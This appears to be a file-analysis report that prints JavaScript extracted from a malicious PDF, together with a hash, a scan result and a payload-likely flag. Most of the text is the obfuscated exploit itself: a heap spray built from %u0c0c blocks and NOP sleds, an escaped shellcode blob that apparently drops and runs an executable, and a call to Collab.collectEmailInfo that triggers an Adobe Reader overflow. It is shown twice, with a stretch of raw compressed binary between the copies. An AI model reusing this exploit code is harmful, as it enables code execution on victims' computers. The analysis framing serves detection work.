for (zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm=0;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm<1450;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm++) ckfgWiGNFKsVyrV[zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = UHNijmYGB("%u0c0c%u0c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x4000) iJCYnMqYfdUqJybccHmtjpgocdxIgC+=iJCYnMqYfdUqJybccHmtjpgocdxIgC;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
combined_document_js_000.js deobfuscated-js combined document JavaScript streams at offset 0x12B202 6104 bytes
SHA-256: 906238ac485d7c548691b73b557ffc9622a7553e15e6ab7a6fdbcd9009c25a3d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
<</Filter[/FlateDecode]/Length 1605>>stream
H��WYO#G ~_i��e		�ݨ�虞e�� � ̂��I�0}�c|���!� OUό
( 6�j_ZMMW�W_}�m�p���Z�h�?) ��j!�;u��C  .����FU��jwyRꌦ���y}u7>� ����ol��Ƨ 	�[{G� � B�� � �[	�8{+�=wo�  ,.a -D�  ?��V��	 B��" � �* @Т �� �O�$
@| ���0�C X\�ﭴ�@&%|��򈀯�`<u�]  �4 � �0
 �� - �,憀#�: � xʑ �
 ��� ���q45���Bd�  D�]��Y � )� # I�
\}�Pmf���� 5�6Y!��aV" �.G�(���8 �'`X (V颫e  � 
\ �O�#�'B���!�x*���� @k<� ���OM��e� ��"H �A �B _fܦN��P|($� ;6 P!dU���^��x��<�f��� # :L�����" ���k���C'  `8X �����+�3Y� �C��PF
>r�AX��"� |l. W �0ur5�H-�2�\c&  Z�  t行�� �~�:�BAD �TC�{ 2�0 �&�V([��Zw  �-���[� �g'Γ���H�~W&�5m�H��p�}�ѭ�g$�Xv�  (�,� Ah���b[u W�cCaf�=�C ��Px�  {��)�S  h��P��~ ���N� ⳲF�D���H H�%�Y��dl�; Ʋy� �7e3e��:��5Ӗ c�
 u�V� ����� ��3.Xr��&��+�؅G��T� �(�4�q\w� �-����*� /�d a���B��� j.�dD��Z ׭.<�Q�Ax  ɶ
< L� ��-H� ��U ��a���C`�A`� �81� a�� ��=	�g �27��̪M i����*�@eN ���ñtw��� �8L��   j�R��D��Sz�ʭ ��d��5 $�) �X��2j�V �o T�Vf��>���A��a�;��a�g�������r �k�p!�M�̧�f�v7�Λg�F�T�D��U�ܫ\ Y6;� �_�������q �
�~�� � ��  SB�N5���h~�e�~|9���iq҇�=��� #�y��� ���YN�v���S>��]���N��̭�u Gl ��V��� �v�z; ��;�!�Ǖv�
 6�n�՜�V�U�R :��\����M ������f������JOĜ��Ws �Ͽ}k�Nz7� ���^�x3 � �.�F � #���� �Ï ��h�r��ך��� 
9Ƚ �p��w� �8 
[Q�tU?�-�qqX��xں��uU���<��]Uo�9�O�ݓw�h1�o��u �^����zQ^DQ�? j�`k���<� �ɧ��� �.]5�j�R�| �����@�q1��j�*=vk'��; y�D>��r����Qt���3f�k�l\�^ r�k�;N �u��� �[���utҪ6 ݇9^7S�� ���a� {/ o��� uQ}���z|�[G�����m�=�L:��7���r !�ǭs9��� �ʦ8��U ��ՠ��59��Fe�*m��	� ?"�W˥?&r�p�{��o?"� �� �z��&�O~�(��g�}-;�� .Dm� �
fBn���g� ��	��� � " ��8 ���p��wH� F�_�l< y{9�+@Y6  � ��I ��S=�� .�ї\>�i� |y#�_ �  0 ��Ga
endstre  
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("\x25\x759090\x25\x759090\x25\x759090\x25\x753de9\x25\x750001%u5600%uc033%u8b64%u3040%u408b%u8b0c"+
"%u1c70%u8bad%u0840%uc35e%u50ad%ue852\x25\x75000d\x25\x750000"+
"%u0789%uc483%u8308%u04c7%uf13b%uec75%u60c3%u6c8b"+
"%u2424%u458b%u8b3c%u2854%u0378%u8bd5%u184a%u5a8b"+
"%u0320%ue3dd%u4934%u348b%u038b%u33f5%u33ff%ufcc0"+
"%u84ac%u74c0%uc107%u0dcf%uf803%uf4eb%u7c3b%u2824"+
"%ue175%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03"+
"%u048b%u038b%u89c5%u2444%u611c%uc7c3%u6445%u0000"+
"%u0000%u006a%u458d%u505c%u0068%u0004%uff00%u3c75"+
"%u75ff%uff48%u1855%uc933%u8b66%u5c4d%u7d8b%u8b3c"+
"%ub3f7%uacd8%uc332%ufeaa%ue2cb%u6af8%u8d00%u6045"+
"%uff50%u5c75%u558b%u523c%u75ff%uff4c%u1c55%u558b"+
"%u2960%u5855%u7d83%u0058%ub87f%u75ff%uff4c%u0855"+
"%u8ec3%u0e4e%u83ec%ub5b9%ufb78%ufd97%u330f%u8aca"+
"%u4f5b%uc703%ua5bf%u0017%u167c%ufa65%u1f10%u0a79"+
"%uace8%uda08%uad76%u7d9b%u98df%u8afe%uec0e\x25\x750397"+
"%u000c%u0000%u0000%u0000%u0000%u0000%u0000%u0000"+
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"+
"%u0000%u0000%ubb00%ubbbb%u00bb%u0000%u0000%u0000"+
"%u0000%u0000%u0000%u0000%u7400%u6d65%u2e70%u7865"+
"%u0065%u00e8%u0000%u5d00%ued81%u0076%u0000\x25\x75b2e8"+
"%ufffe%u8bff%u8bd0%u8bf5%u8bfe%u83ce%u30c1%ub5e8"+
"%ufffe%u33ff%u89c9%u484d%u4583%u0448%uc933%uff51"+
"%u4875%u55ff%u3d24%ub600%u0012%uec72%u003d%u12ba"+
"%u7700%u68e5%u00ff%u0000%u406a%u55ff%u892c%u3845"+
"%u6850%u00ff%u0000%u55ff%u8b0c%u8bc8%u3845%uc103"+
"%ue883%uc605%u0000%u75ff%uff38%u1055%u006a%u006a"+
"%u0068%u001f%uff00%u4875%u55ff%u6a20%u8d00%u5c45"+
"%u6a50%u8d04%u5445%uff50%u4875%u55ff%u6a18%u6a00"+
"%u6800%u1f10%u0000%u75ff%uff48%u2055%u6a55\x25\x756800"+
"%u0080%u0000%u026a%u006a%u016a%u0068%u0000%u8d40"+
"%u6845%u8350%u1445%ueb05%u8b0a%u8bf5%u55ff%uec8b"+
"%u66ff%ue814%ufff1%uffff%u835d%ufff8%u0275%u39eb"+
"%u4589%u684c%u0400%u0000%u406a%u55ff%u892c%u3c45"+
"%u458b%u8954%u5845%u50e8%ufffe%u55ff%uc933%u8d51"+
"%u6845%u8350%u2845%ueb05%u8b0a%u90f5%u5590%uec8b"+
"%u66ff%ue828\x25\x75fff1%uffff%u6a5d\x25\x756a00%uffff%u0455"+
"%u0000");
var o ="";
for (QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR=128;QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR>=0;--QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR) o += UHNijmYGB("%u4943%u9f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = UHNijmYGB("%u4943%u9f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl;
ckfgWiGNFKsVyrV = new Array();
for (zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm=0;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm<1450;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm++) ckfgWiGNFKsVyrV[zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = UHNijmYGB("%u0c0c%u0c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x4000) iJCYnMqYfdUqJybccHmtjpgocdxIgC+=iJCYnMqYfdUqJybccHmtjpgocdxIgC;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});

Open this report in the interactive analyzer, or submit your own file for analysis.